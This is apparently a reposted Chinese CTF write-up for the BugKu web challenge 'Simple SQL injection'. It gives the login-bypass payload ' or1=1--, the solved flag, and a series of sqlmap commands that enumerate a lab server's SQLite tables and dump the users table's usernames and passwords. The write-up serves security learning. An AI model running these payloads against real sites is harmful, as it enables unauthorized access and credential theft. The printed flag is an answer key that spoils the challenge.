当前位置: 首页 > news >正文

BugKu web 之 Simple SQL injection

news 2026/6/30 12:08:20 


' or1=1--

密码任意都可以,账号使用万能密码。

Flag: flag{95f2ab52fc27f73b4c6cf416082c2034}

但是不走捷径,该怎么做呢?

显示登录失败。

提示:尝试分析新闻详情页的URL参数

随便点击一篇新闻,然后用sqlmap进行爆破。

python sqlmap.py http://171.80.2.169:19019/article?id=1--batch

SQLite 无「数据库」概念(只有单个文件),直接枚举所有表。

python sqlmap.py -u"http://171.80.2.169:19019/article?id=1"--batch --tables


枚举 users 表的所有字段

python sqlmap.py -u"http://171.80.2.169:19019/article?id=1"--batch -Tusers--columns

直接提取 users 表中 username 和 password 字段的所有数据

python sqlmap.py -u"http://171.80.2.169:19019/article?id=1"--batch -Tusers-C username,password --dump

http://www.cnnetsun.cn/news/95213.html

相关文章:

  • Vue3使用pinia做全局状态管理的简单示例
  • 2025计算机能力竞赛暨城市联赛——算法编程赛道【秋季赛】(二)
  • 用户体验调研问卷:LobeChat设计有效题目
  • BONT-L肽有效成分:棕榈酰六肽-19 Palmitoyl Hexapeptide-19
  • 1、Linux网络管理与资源指南
  • 9、Linux 下 PPP 协议的深入解析与配置指南
  • 13、Linux网络重要特性全解析
  • 17、深入了解 Taylor UUCP:原理、配置与应用
  • 避开“入狱”陷阱:零基础网络安全入门实战指南与知识图谱
  • 基于深度学习的安防监控校园暴力行为检测算法研究
  • 基于STM32单片机的智能家居系统设计
  • 14、Red Hat Linux实用应用指南
  • 零基础学网络安全?入门前必看的3大认知误区与5个关键准备
  • 21、红帽Linux安全与故障排除全攻略
  • 基于微信小程序的校园电子图书馆系统毕业设计
  • 创新首发!基于VMD+WDCNN-SENet的故障诊断模型
  • Python好不好学?
  • NAS 部署私人云平台,支持扩展only office等办公应用
  • Linux EEPROM调试
  • 终极解决方案:告别Visual C++运行库缺失困扰,一键完成全版本部署
  • 安达发|当艺术遇见算法:APS系统如何解开工艺品行业的生产魔方
  • Obsidian Style Settings插件使用指南:打造个性化笔记界面
  • Swagger2Word终极指南:一键将API文档转为专业Word格式
  • 【C2000中断Debug】如何定位与调试异常中断
  • vue3中computed计算属性和方法的区别
  • LobeChat国际社区动态:全球开发者共同维护
  • 基于STM32的水质检测系统设计与实现
  • Radm1n1ster CN
  • 重构智慧书-第18条:实力与实干
  • 读捍卫隐私08智能出行